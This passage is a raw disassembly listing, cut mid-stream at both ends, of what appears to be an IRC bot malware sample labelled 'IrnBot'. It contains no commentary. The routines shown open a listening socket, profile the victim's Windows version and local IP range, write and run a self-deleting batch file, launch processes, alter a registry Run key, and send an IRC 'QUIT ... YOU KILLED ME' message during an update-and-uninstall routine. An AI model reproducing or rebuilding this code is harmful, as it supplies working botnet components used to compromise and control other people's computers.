		call	ds:dword_41E220	; socket
		cmp	eax, 0FFFFFFFFh
		mov	dword_428B0C, eax
		jnz	short loc_419838
		push	eax

loc_41982B:				; CODE XREF: sub_41979F+E7j
		call	ds:dword_41E280	; closesocket
		xor	eax, eax
		jmp	loc_4198BB
; ---------------------------------------------------------------------------

loc_419838:				; CODE XREF: sub_41979F+89j
		mov	eax, 0FFDCh
		mov	ebx, 3E8h
		call	sub_419F47
		push	eax
		mov	dword_4288F4, eax
		mov	word_4289F4, 2
		call	ds:dword_41E270	; htons
		and	dword_4289F8, 0
		push	10h
		push	offset word_4289F4
		push	dword_428B0C
		mov	word_4289F6, ax
		call	ds:dword_41E27C	; bind
		test	eax, eax
		jz	short loc_419888

loc_419880:				; CODE XREF: sub_41979F+102j
					; sub_41979F+114j
		push	dword_428B0C
		jmp	short loc_41982B
; ---------------------------------------------------------------------------

loc_419888:				; CODE XREF: sub_41979F+DFj
		push	9
		push	401h
		push	[esp+18h+arg_0]
		push	dword_428B0C
		call	ds:dword_41E22C	; WSAAsyncSelect
		test	eax, eax
		jnz	short loc_419880
		push	4
		push	dword_428B0C
		call	ds:dword_41E230	; listen
		test	eax, eax
		jnz	short loc_419880
		inc	eax
		mov	byte_428C14, al

loc_4198BB:				; CODE XREF: sub_41979F+94j
		pop	edi
		pop	esi
		pop	ebp
		pop	ebx
		retn
sub_41979F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4198C0	proc near		; DATA XREF: sub_419997+21o

var_50		= dword	ptr -50h
var_4C		= dword	ptr -4Ch
var_48		= dword	ptr -48h
var_44		= dword	ptr -44h
var_40		= dword	ptr -40h
var_3C		= dword	ptr -3Ch
var_38		= dword	ptr -38h
var_34		= dword	ptr -34h
var_30		= dword	ptr -30h
var_2C		= dword	ptr -2Ch
var_28		= dword	ptr -28h
var_24		= dword	ptr -24h
var_20		= byte ptr -20h

		push	ebp
		mov	ebp, esp
		sub	esp, 50h
		mov	eax, dword_428A04
		push	ebx
		mov	ebx, ds:off_41E1F0
		push	esi
		push	edi
		mov	edi, 7F00h
		push	edi
		xor	esi, esi
		push	esi
		mov	[ebp+var_3C], eax
		mov	[ebp+var_28], offset dword_42786C
		mov	[ebp+var_48], offset sub_41976B
		mov	[ebp+var_4C], 8
		mov	[ebp+var_50], 30h
		call	ebx ; sub_44A53E
		push	edi
		push	esi
		mov	[ebp+var_38], eax
		call	ebx ; sub_44A53E
		push	edi
		push	esi
		mov	[ebp+var_24], eax
		call	ds:off_41E208
		mov	[ebp+var_34], eax
		lea	eax, [ebp+var_50]
		push	eax
		mov	[ebp+var_2C], esi
		mov	[ebp+var_44], esi
		mov	[ebp+var_40], esi
		mov	[ebp+var_30], 1
		call	ds:off_41E1EC
		test	ax, ax
		jz	short loc_41998E
		push	esi
		push	dword_428A04
		mov	eax, 80000000h
		push	esi
		push	esi
		push	esi
		push	esi
		push	eax
		push	eax
		push	0CF0000h
		push	offset aIrnbot	; "IrnBot"
		push	offset dword_42786C
		push	esi
		call	ds:off_41E1F8
		push	eax
		call	sub_41979F
		test	eax, eax
		pop	ecx
		jz	short loc_41998E
		mov	edi, ds:off_41E204
		jmp	short loc_419981
; ---------------------------------------------------------------------------

loc_41996D:				; CODE XREF: sub_4198C0+CCj
		lea	eax, [ebp+var_20]
		push	eax
		call	ds:off_41E1F4
		lea	eax, [ebp+var_20]
		push	eax
		call	ds:off_41E200

loc_419981:				; CODE XREF: sub_4198C0+ABj
		push	esi
		push	esi
		push	esi
		lea	eax, [ebp+var_20]
		push	eax
		call	edi ; sub_4508FD
		test	eax, eax
		jnz	short loc_41996D

loc_41998E:				; CODE XREF: sub_4198C0+70j
					; sub_4198C0+A3j
		pop	edi
		pop	esi
		xor	eax, eax
		pop	ebx
		leave
		retn	4
sub_4198C0	endp


; =============== S U B	R O U T	I N E =======================================



sub_419997	proc near		; CODE XREF: .text:00402514p
					; sub_41C7BA+3C5p
		push	4
		mov	eax, offset loc_41CE59
		call	sub_404B8C
		push	8
		call	sub_4035D9
		mov	esi, eax
		pop	ecx
		mov	[ebp-10h], esi
		and	dword ptr [ebp-4], 0
		test	esi, esi
		jz	short loc_4199CB
		push	offset sub_4198C0
		xor	ecx, ecx
		mov	edi, offset aHs	; "HS"
		call	sub_414D0E
		jmp	short loc_4199CD
; ---------------------------------------------------------------------------

loc_4199CB:				; CODE XREF: sub_419997+1Fj
		xor	eax, eax

loc_4199CD:				; CODE XREF: sub_419997+32j
		cmp	dword ptr [eax+4], 0
		setnz	al
		call	sub_404C2B
		retn
sub_419997	endp ; sp-analysis failed


; =============== S U B	R O U T	I N E =======================================



sub_4199DA	proc near		; CODE XREF: sub_419F47:loc_419F6Bp
		mov	eax, dword_428910
		mov	edx, dword_428914
		lea	ecx, ds:428918h[eax*4]
		push	esi
		mov	esi, eax
		mov	eax, dword_428918[edx*4]
		add	eax, [ecx]
		and	eax, 3FFFFFFFh
		inc	esi
		cmp	esi, 37h
		mov	[ecx], eax
		jnz	short loc_419A07
		xor	esi, esi

loc_419A07:				; CODE XREF: sub_4199DA+29j
		inc	edx
		cmp	edx, 37h
		jnz	short loc_419A0F
		xor	edx, edx

loc_419A0F:				; CODE XREF: sub_4199DA+31j
		mov	dword_428910, esi
		mov	dword_428914, edx
		sar	eax, 6
		pop	esi
		retn
sub_4199DA	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419A20	proc near		; CODE XREF: sub_401DA7p
					; sub_402129+125p ...

var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_8		= dword	ptr -8
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 14h
		push	ebx
		lea	eax, [ebp+var_10]
		push	eax
		call	ds:dword_41E058	; QueryPerformanceCounter
		test	eax, eax
		jz	short loc_419A9C
		lea	eax, [ebp+var_8]
		push	eax
		call	ds:off_41E064
		test	eax, eax
		jz	short loc_419A9C
		push	[ebp+var_4]
		push	[ebp+var_8]
		push	[ebp+var_C]
		push	[ebp+var_10]
		call	sub_41CC30
		push	0
		push	15180h
		push	edx
		push	eax
		call	sub_411DC0
		push	0
		push	0E10h
		push	ebx
		push	ecx
		mov	dword_4288F8, eax
		mov	dword_4288FC, edx
		call	sub_411DC0
		push	0
		push	3Ch
		push	ebx
		push	ecx
		mov	dword_428900, eax
		mov	dword_428904, edx
		call	sub_41CC30
		mov	dword_428908, eax
		mov	dword_42890C, edx

loc_419A9C:				; CODE XREF: sub_419A20+13j
					; sub_419A20+21j
		pop	ebx
		leave
		retn
sub_419A20	endp


; =============== S U B	R O U T	I N E =======================================



sub_419A9F	proc near		; CODE XREF: sub_402129+EFp
					; sub_41810B+BCp ...

arg_0		= dword	ptr  4
arg_4		= byte ptr  8

		push	[esp+arg_0]
		push	0
		push	esi
		call	sub_408130
		add	esp, 0Ch
		cmp	[esp+arg_4], 0
		push	[esp+arg_0]
		push	esi
		jz	short loc_419AC1
		push	1002h
		jmp	short loc_419AC3
; ---------------------------------------------------------------------------

loc_419AC1:				; CODE XREF: sub_419A9F+19j
		push	7

loc_419AC3:				; CODE XREF: sub_419A9F+20j
		push	800h
		call	ds:off_41E054
		mov	eax, esi
		retn
sub_419A9F	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame fpd=74h


sub_419AD1	proc near		; CODE XREF: sub_402129+DAp
					; sub_41810B+8Bp ...

var_98		= dword	ptr -98h
var_94		= dword	ptr -94h
var_90		= dword	ptr -90h
var_8C		= dword	ptr -8Ch
var_88		= dword	ptr -88h
var_84		= byte ptr -84h
var_4		= dword	ptr -4
arg_0		= byte ptr  8

		push	ebp
		lea	ebp, [esp-74h]
		sub	esp, 98h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+74h+var_4], eax
		push	ebx
		push	edi
		lea	eax, [ebp+74h+var_98]
		push	eax
		mov	ebx, ecx
		mov	[ebp+74h+var_98], 94h
		call	ds:dword_41E068	; GetVersionExA
		push	ebx
		xor	edi, edi
		push	edi
		push	esi
		call	sub_408130
		add	esp, 0Ch
		cmp	[ebp+74h+var_94], 6
		jnz	short loc_419B1A
		cmp	[ebp+74h+var_90], edi
		jnz	short loc_419B85
		push	offset aVis	; "VIS"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B1A:				; CODE XREF: sub_419AD1+3Bj
		cmp	[ebp+74h+var_94], 5
		jnz	short loc_419B46
		cmp	[ebp+74h+var_90], 2
		jnz	short loc_419B2D
		push	offset a2k3	; "2K3"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B2D:				; CODE XREF: sub_419AD1+53j
		cmp	[ebp+74h+var_90], 1
		jnz	short loc_419B3A
		push	offset aXp_0	; "XP"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B3A:				; CODE XREF: sub_419AD1+60j
		cmp	[ebp+74h+var_90], edi
		jnz	short loc_419B85
		push	offset a2k	; "2K"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B46:				; CODE XREF: sub_419AD1+4Dj
		cmp	[ebp+74h+var_94], 4
		jnz	short loc_419B85
		cmp	[ebp+74h+var_90], 5Ah
		jnz	short loc_419B59
		push	offset aMe	; "ME"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B59:				; CODE XREF: sub_419AD1+7Fj
		cmp	[ebp+74h+var_90], 1
		jnz	short loc_419B66
		push	offset a98	; "98"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B66:				; CODE XREF: sub_419AD1+8Cj
		cmp	[ebp+74h+var_90], edi
		jnz	short loc_419B85
		cmp	[ebp+74h+var_88], 2
		jnz	short loc_419B78
		push	offset aNt	; "NT"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B78:				; CODE XREF: sub_419AD1+9Ej
		cmp	[ebp+74h+var_88], 1
		jnz	short loc_419B97
		push	offset a95	; "95"
		jmp	short loc_419B8A
; ---------------------------------------------------------------------------

loc_419B85:				; CODE XREF: sub_419AD1+40j
					; sub_419AD1+6Cj ...
		push	offset aUnk	; "UNK"

loc_419B8A:				; CODE XREF: sub_419AD1+47j
					; sub_419AD1+5Aj ...
		lea	eax, [ebx-1]
		push	eax
		push	esi
		call	sub_40307C
		add	esp, 0Ch

loc_419B97:				; CODE XREF: sub_419AD1+ABj
		mov	eax, esi
		lea	edx, [eax+1]

loc_419B9C:				; CODE XREF: sub_419AD1+D0j
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_419B9C
		sub	eax, edx
		cmp	[ebp+74h+arg_0], cl
		mov	[eax+esi], cl
		jz	loc_419C33
		push	ebx
		call	sub_402BD6
		mov	edi, eax
		push	edi
		call	sub_402FD3
		push	eax
		push	0
		push	edi
		call	sub_408130
		add	esp, 14h
		push	[ebp+74h+var_8C]
		lea	eax, [ebp+74h+var_84]
		push	[ebp+74h+var_90]
		push	[ebp+74h+var_94]
		push	eax
		push	esi
		push	offset aOsMicrosoftWin ; "[OS: Microsoft Windows %s %s (%i.%i bui"...
		push	edi
		call	sub_402FD3
		pop	ecx
		dec	eax
		push	eax
		push	edi
		call	sub_40307C
		mov	eax, edi
		add	esp, 20h
		lea	ecx, [eax+1]

loc_419BF5:				; CODE XREF: sub_419AD1+129j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419BF5
		push	ebx
		sub	eax, ecx
		push	0
		push	esi
		mov	[eax+edi], dl
		call	sub_408130
		push	edi
		push	offset aS_6	; "%s"
		dec	ebx
		push	ebx
		push	esi
		call	sub_40307C
		mov	eax, esi
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_419C20:				; CODE XREF: sub_419AD1+154j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419C20
		sub	eax, ecx
		push	edi
		mov	[eax+esi], dl
		call	sub_403129
		pop	ecx

loc_419C33:				; CODE XREF: sub_419AD1+DAj
		mov	ecx, [ebp+74h+var_4]
		pop	edi
		xor	ecx, ebp
		mov	eax, esi
		pop	ebx
		call	sub_402C9E
		add	ebp, 74h
		leave
		retn
sub_419AD1	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419C46	proc near		; CODE XREF: sub_401DED+50p
					; sub_402129+FEp ...

var_1C		= dword	ptr -1Ch
var_18		= byte ptr -18h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_12		= byte ptr -12h
var_11		= byte ptr -11h
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 20h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		push	edi
		xor	eax, eax
		lea	edi, [ebp+var_18]
		stosd
		stosd
		stosd
		stosd
		xor	eax, eax
		mov	edi, esi
		stosd
		stosd
		stosd
		stosd
		lea	eax, [ebp+var_1C]
		push	eax
		lea	eax, [ebp+var_18]
		push	eax
		push	[ebp+arg_0]
		mov	[ebp+var_1C], 10h
		call	ds:dword_41E238	; getsockname
		movzx	eax, [ebp+var_11]
		push	eax
		movzx	eax, [ebp+var_12]
		push	eax
		movzx	eax, [ebp+var_13]
		push	eax
		movzx	eax, [ebp+var_14]
		push	eax
		push	offset aD_D_D_D_0 ; "%d.%d.%d.%d"
		push	0Fh
		push	esi
		call	sub_40307C
		mov	eax, esi
		add	esp, 1Ch
		lea	ecx, [eax+1]

loc_419CA9:				; CODE XREF: sub_419C46+68j
		mov	dl, [eax]
		inc	eax
		test	dl, dl
		jnz	short loc_419CA9
		sub	eax, ecx
		mov	ecx, [ebp+var_8]
		mov	[eax+esi], dl
		xor	ecx, ebp
		mov	eax, esi
		pop	edi
		call	sub_402C9E
		leave
		retn
sub_419C46	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419CC4	proc near		; CODE XREF: .text:004025B0p
					; sub_4182F6+A5p ...

var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		push	ecx
		push	esi
		mov	esi, ecx
		mov	cl, [eax]
		test	cl, cl
		push	edi
		jz	short loc_419D2D

loc_419CD2:				; CODE XREF: sub_419CC4+24j
		mov	dl, [esi]
		cmp	dl, 2Ah
		jz	short loc_419CEA
		cmp	dl, cl
		jz	short loc_419CE2
		cmp	dl, 3Fh
		jnz	short loc_419D08

loc_419CE2:				; CODE XREF: sub_419CC4+17j
		inc	esi
		inc	eax
		mov	cl, [eax]
		test	cl, cl
		jnz	short loc_419CD2

loc_419CEA:				; CODE XREF: sub_419CC4+13j
		mov	cl, [eax]
		test	cl, cl
		jz	short loc_419D2D
		mov	edi, [ebp+var_4]

loc_419CF3:				; CODE XREF: sub_419CC4+5Fj
		mov	dl, [esi]
		cmp	dl, 2Ah
		jnz	short loc_419D0C
		inc	esi
		cmp	byte ptr [esi],	0
		jz	short loc_419D27
		mov	[ebp+var_4], esi
		lea	edi, [eax+1]
		jmp	short loc_419D1F
; ---------------------------------------------------------------------------

loc_419D08:				; CODE XREF: sub_419CC4+1Cj
		xor	eax, eax
		jmp	short loc_419D39
; ---------------------------------------------------------------------------

loc_419D0C:				; CODE XREF: sub_419CC4+34j
		cmp	dl, cl
		jz	short loc_419D1D
		cmp	dl, 3Fh
		jz	short loc_419D1D
		mov	esi, [ebp+var_4]
		mov	eax, edi
		inc	edi
		jmp	short loc_419D1F
; ---------------------------------------------------------------------------

loc_419D1D:				; CODE XREF: sub_419CC4+4Aj
					; sub_419CC4+4Fj
		inc	esi
		inc	eax

loc_419D1F:				; CODE XREF: sub_419CC4+42j
					; sub_419CC4+57j
		mov	cl, [eax]
		test	cl, cl
		jnz	short loc_419CF3
		jmp	short loc_419D2D
; ---------------------------------------------------------------------------

loc_419D27:				; CODE XREF: sub_419CC4+3Aj
		xor	eax, eax
		inc	eax
		jmp	short loc_419D39
; ---------------------------------------------------------------------------

loc_419D2C:				; CODE XREF: sub_419CC4+6Cj
		inc	esi

loc_419D2D:				; CODE XREF: sub_419CC4+Cj
					; sub_419CC4+2Aj ...
		cmp	byte ptr [esi],	2Ah
		jz	short loc_419D2C
		xor	eax, eax
		cmp	[esi], al
		setz	al

loc_419D39:				; CODE XREF: sub_419CC4+46j
					; sub_419CC4+66j
		pop	edi
		pop	esi
		leave
		retn
sub_419CC4	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419D3D	proc near		; CODE XREF: sub_41A0E3+14Ap

var_23C		= byte ptr -23Ch
var_23B		= byte ptr -23Bh
var_13C		= byte ptr -13Ch
var_13B		= byte ptr -13Bh
var_3C		= byte ptr -3Ch
var_3B		= byte ptr -3Bh
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 23Ch
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		xor	ebx, ebx
		push	37h
		lea	eax, [ebp+var_3B]
		push	ebx
		push	eax
		mov	[ebp+var_3C], bl
		call	sub_408130
		mov	esi, 0FFh
		push	esi
		lea	eax, [ebp+var_23B]
		push	ebx
		push	eax
		mov	[ebp+var_23C], bl
		call	sub_408130
		push	esi
		lea	eax, [ebp+var_13B]
		push	ebx
		push	eax
		mov	[ebp+var_13C], bl
		call	sub_408130
		add	esp, 24h
		push	100h
		lea	eax, [ebp+var_13C]
		push	eax
		push	ebx
		call	ds:dword_41E0E0	; GetModuleHandleA
		push	eax
		call	ds:dword_41E060	; GetModuleFileNameA
		lea	eax, [ebp+var_13C]
		push	eax
		push	eax
		lea	eax, [ebp+var_23C]
		push	offset a@echoOff1DelSI ; "@echo	off\r\n:1\r\ndel \"%s\"\r\nif exist \"%s\" "...
		push	eax
		call	sub_403643
		push	104h
		call	sub_402BD6
		mov	esi, eax
		push	esi
		call	sub_402FD3
		add	esp, 18h
		dec	eax
		push	eax
		push	esi
		call	ds:dword_41E0F0	; GetSystemDirectoryA
		call	sub_4038F1
		push	18h
		cdq
		pop	ecx
		idiv	ecx
		add	edx, 61h
		push	edx
		call	sub_4038F1
		push	18h
		cdq
		pop	ecx
		idiv	ecx
		add	edx, 61h
		push	edx
		call	sub_4038F1
		push	18h
		cdq
		pop	ecx
		idiv	ecx
		add	edx, 61h
		push	edx
		call	sub_4038F1
		push	0Ah
		cdq
		pop	ecx
		idiv	ecx
		push	edx
		call	sub_4038F1
		push	0Ah
		cdq
		pop	ecx
		idiv	ecx
		push	edx
		call	sub_4038F1
		push	0Ah
		pop	ecx
		cdq
		idiv	ecx
		lea	eax, [ebp+var_3C]
		push	edx
		push	esi
		push	offset aSTmpIIICCC_bat ; "%s\\tmp-%i%i%i-%c%c%c.bat"
		push	eax
		call	sub_403643
		push	esi
		call	sub_403129
		lea	eax, [ebp+var_3C]
		push	offset aW	; "w"
		push	eax
		call	sub_403782
		mov	esi, eax
		add	esp, 30h
		cmp	esi, ebx
		jz	short loc_419E8B
		lea	eax, [ebp+var_23C]
		push	eax
		push	offset aS_7	; "%s"
		push	esi
		call	sub_403795
		push	esi
		call	sub_403A52
		add	esp, 10h
		push	ebx
		push	ebx
		push	ebx
		lea	eax, [ebp+var_3C]
		push	eax
		push	ebx
		push	ebx
		call	ds:dword_41E1E0

loc_419E8B:				; CODE XREF: sub_419D3D+122j
		mov	ecx, [ebp+var_4]
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_419D3D	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419E99	proc near		; CODE XREF: sub_41C4FC+199p
					; sub_41C7BA+1C1p

var_16C		= dword	ptr -16Ch
var_168		= byte ptr -168h
var_124		= dword	ptr -124h
var_120		= byte ptr -120h
var_114		= byte ptr -114h
var_113		= byte ptr -113h
var_8		= dword	ptr -8
arg_0		= dword	ptr  8
arg_4		= byte ptr  0Ch

		push	ebp
		mov	ebp, esp
		sub	esp, 170h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		push	ebx
		push	esi
		push	edi
		xor	ebx, ebx
		push	40h
		lea	eax, [ebp+var_168]
		push	ebx
		push	eax
		mov	[ebp+var_16C], ebx
		call	sub_408130
		xor	eax, eax
		mov	[ebp+var_124], ebx
		lea	edi, [ebp+var_120]
		stosd
		stosd
		mov	esi, 103h
		push	esi
		stosd
		lea	eax, [ebp+var_113]
		push	ebx
		push	eax
		mov	[ebp+var_114], bl
		call	sub_408130
		lea	eax, [ebp+arg_4]
		push	eax
		push	[ebp+arg_0]
		lea	eax, [ebp+var_114]
		push	esi
		push	eax
		call	sub_4039C4
		add	esp, 28h
		lea	eax, [ebp+var_124]
		push	eax
		lea	eax, [ebp+var_16C]
		push	eax
		push	ebx
		push	ebx
		push	28h
		push	ebx
		push	ebx
		push	ebx
		lea	eax, [ebp+var_114]
		push	eax
		push	ebx
		call	ds:dword_41E05C	; CreateProcessA
		mov	ecx, [ebp+var_8]
		test	eax, eax
		pop	edi
		setnz	al
		pop	esi
		xor	ecx, ebp
		pop	ebx
		call	sub_402C9E
		leave
		retn
sub_419E99	endp

; ---------------------------------------------------------------------------
		push	0
		call	sub_403ACE
		pop	ecx
		retn

; =============== S U B	R O U T	I N E =======================================



sub_419F47	proc near		; CODE XREF: sub_413FED+81p
					; sub_413FED+94p ...
		push	esi
		mov	esi, eax
		xor	eax, eax
		inc	eax
		sub	eax, ebx
		add	esi, eax
		cmp	esi, 1
		jg	short loc_419F5A
		mov	eax, ebx
		pop	esi
		retn
; ---------------------------------------------------------------------------

loc_419F5A:				; CODE XREF: sub_419F47+Dj
		push	2
		pop	eax
		cmp	esi, eax
		jle	short loc_419F67

loc_419F61:				; CODE XREF: sub_419F47+1Ej
		add	eax, eax
		cmp	eax, esi
		jl	short loc_419F61

loc_419F67:				; CODE XREF: sub_419F47+18j
		push	edi
		lea	edi, [eax-1]

loc_419F6B:				; CODE XREF: sub_419F47+2Dj
		call	sub_4199DA
		and	eax, edi
		cmp	eax, esi
		jge	short loc_419F6B
		pop	edi
		add	eax, ebx
		pop	esi
		retn
sub_419F47	endp


; =============== S U B	R O U T	I N E =======================================



sub_419F7B	proc near		; CODE XREF: .text:004028C4p
					; sub_413FED:loc_414501p ...
		and	dword_428910, 0
		push	0
		mov	dword_428914, 1Fh
		call	sub_403ACE
		mov	edx, 3FFFFFFFh
		and	eax, edx
		pop	ecx
		mov	dword_428918, eax
		mov	dword_42891C, 1
		mov	eax, offset dword_428918
		push	esi

loc_419FB0:				; CODE XREF: sub_419F7B+48j
		lea	ecx, [eax+4]
		mov	esi, [ecx]
		add	esi, [eax]
		and	esi, edx
		mov	[eax+8], esi
		mov	eax, ecx
		cmp	eax, offset dword_4289EC
		jl	short loc_419FB0
		pop	esi
		retn
sub_419F7B	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_419FC7	proc near		; CODE XREF: sub_41810B+E6p
					; sub_41B423+381p

var_24		= byte ptr -24h
var_14		= byte ptr -14h
var_13		= byte ptr -13h
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 24h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	esi
		push	edi
		push	dword_428D1C
		mov	[ebp+var_14], 0
		xor	eax, eax
		lea	edi, [ebp+var_13]
		stosd
		stosd
		stosd
		stosw
		lea	esi, [ebp+var_14]
		stosb
		call	sub_419C46
		pop	ecx
		mov	eax, esi
		mov	ecx, offset a192_168__ ; "192.168.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	loc_41A0D3
		mov	eax, esi
		mov	ecx, offset a10___ ; "10.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	loc_41A0D3
		mov	eax, esi
		mov	ecx, offset a111___ ; "111.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	loc_41A0D3
		mov	eax, esi
		mov	ecx, offset a15___ ; "15.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	loc_41A0D3
		mov	eax, esi
		mov	ecx, offset a16___ ; "16.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	short loc_41A0D3
		mov	eax, esi
		mov	ecx, offset a101___ ; "101.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	short loc_41A0D3
		mov	eax, esi
		mov	ecx, offset a110___ ; "110.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	short loc_41A0D3
		mov	eax, esi
		mov	ecx, offset a112___ ; "112.*.*.*"
		call	sub_419CC4
		test	eax, eax
		jnz	short loc_41A0D3
		push	10h
		pop	esi

loc_41A08A:				; CODE XREF: sub_419FC7+106j
		xor	eax, eax
		lea	edi, [ebp+var_24]
		stosd
		stosd
		stosd
		push	esi
		push	offset a172_D__	; "172.%d.*.*"
		stosd
		lea	eax, [ebp+var_24]
		push	0Fh
		push	eax
		call	sub_40307C
		lea	eax, [ebp+var_24]
		add	esp, 10h
		lea	edx, [eax+1]

loc_41A0AD:				; CODE XREF: sub_419FC7+EBj
		mov	cl, [eax]
		inc	eax
		test	cl, cl
		jnz	short loc_41A0AD
		sub	eax, edx
		mov	[ebp+eax+var_24], cl
		lea	eax, [ebp+var_14]
		lea	ecx, [ebp+var_24]
		call	sub_419CC4
		test	eax, eax
		jnz	short loc_41A0D3
		inc	esi
		cmp	esi, 1Fh
		jbe	short loc_41A08A
		xor	al, al
		jmp	short loc_41A0D5
; ---------------------------------------------------------------------------

loc_41A0D3:				; CODE XREF: sub_419FC7+3Ej
					; sub_419FC7+52j ...
		mov	al, 1

loc_41A0D5:				; CODE XREF: sub_419FC7+10Aj
		mov	ecx, [ebp+var_4]
		pop	edi
		xor	ecx, ebp
		pop	esi
		call	sub_402C9E
		leave
		retn
sub_419FC7	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A0E3	proc near		; CODE XREF: sub_41C4FC+1C5p

var_2A8		= byte ptr -2A8h
var_2A0		= dword	ptr -2A0h
var_29C		= dword	ptr -29Ch
var_298		= dword	ptr -298h
var_294		= dword	ptr -294h
var_290		= dword	ptr -290h
var_28C		= byte ptr -28Ch
var_28B		= byte ptr -28Bh
var_1CC		= byte ptr -1CCh
var_1CB		= byte ptr -1CBh
var_CC		= byte ptr -0CCh
var_CB		= byte ptr -0CBh
var_8		= dword	ptr -8
arg_0		= dword	ptr  8

		push	ebp
		mov	ebp, esp
		sub	esp, 2A8h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_8], eax
		mov	eax, [ebp+arg_0]
		push	ebx
		push	esi
		push	edi
		mov	esi, 0BFh
		xor	ebx, ebx
		push	esi
		mov	[ebp+var_298], eax
		lea	eax, [ebp+var_CB]
		push	ebx
		push	eax
		mov	[ebp+var_CC], bl
		call	sub_408130
		add	esp, 0Ch
		push	esi
		lea	eax, [ebp+var_28B]
		push	ebx
		push	eax
		mov	[ebp+var_28C], bl
		call	sub_408130
		add	esp, 0Ch
		push	ebx
		lea	edi, [ebp+var_CC]
		call	sub_41C1B3
		pop	ecx
		inc	esi
		push	esi
		mov	eax, edi
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		push	esi
		lea	eax, [ebp+var_28C]
		push	ebx
		push	eax
		call	sub_408130
		add	esp, 0Ch
		push	0FFh
		lea	eax, [ebp+var_1CB]
		push	ebx
		push	eax
		mov	[ebp+var_1CC], bl
		call	sub_408130
		mov	eax, dword_43768C
		mov	eax, [eax]
		mov	[ebp+var_290], eax
		mov	eax, offset dword_437688
		add	esp, 0Ch
		mov	[ebp+var_294], eax
		mov	[ebp+var_2A0], eax

loc_41A19C:				; CODE XREF: sub_41A0E3+102j
		mov	eax, dword_43768C
		lea	edi, [ebp+var_2A0]
		lea	esi, [ebp+var_294]
		mov	[ebp+var_29C], eax
		call	sub_40169D
		test	al, al
		jz	short loc_41A1F3
		mov	edi, offset aRegistryMonito ; "Registry	Monitor"
		call	sub_40164F
		mov	esi, eax
		add	esi, 5
		push	11h
		pop	ecx
		xor	eax, eax
		repe cmpsb
		lea	esi, [ebp+var_294]
		jz	short loc_41A1E7
		lea	edi, [ebp+var_2A8]
		call	sub_40166F
		jmp	short loc_41A19C
; ---------------------------------------------------------------------------

loc_41A1E7:				; CODE XREF: sub_41A0E3+F5j
		call	sub_40164F
		mov	eax, [eax]
		call	sub_414C86

loc_41A1F3:				; CODE XREF: sub_41A0E3+D7j
		mov	edi, 100h
		push	edi
		lea	esi, [ebp+var_1CC]
		mov	ebx, offset aDDucivd ; ""
		call	sub_41A33D
		pop	ecx
		mov	eax, esi
		push	eax
		push	offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
		push	80000002h
		call	sub_417BB2
		add	esp, 0Ch
		push	edi
		mov	eax, esi
		push	0
		push	eax
		call	sub_408130
		add	esp, 0Ch
		call	sub_419D3D
		push	[ebp+var_298]
		mov	edi, offset dword_428D1C
		push	offset aQuitSYouKilled ; "QUIT :%s YOU KILLED ME :< --UPDATED\r\n"
		call	sub_417F4C
		pop	ecx
		pop	ecx
		push	0
		call	ds:off_41E050
		int	3		; Trap to Debugger
		jmp	ds:off_41E08C
sub_41A0E3	endp


; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_41A258	proc near		; CODE XREF: sub_41C7BA+31p

var_18		= byte ptr -18h
var_13		= byte ptr -13h
var_10		= dword	ptr -10h
var_C		= dword	ptr -0Ch
var_4		= dword	ptr -4

		push	ebp
		mov	ebp, esp
		sub	esp, 18h
		mov	eax, dword_424064
		xor	eax, ebp
		mov	[ebp+var_4], eax
		push	ebx
		push	esi
		push	edi
		call	ds:dword_41E0C8	; GetCurrentProcess
		mov	esi, offset dword_4218A4
		lea	edi, [ebp+var_10]
		movsd
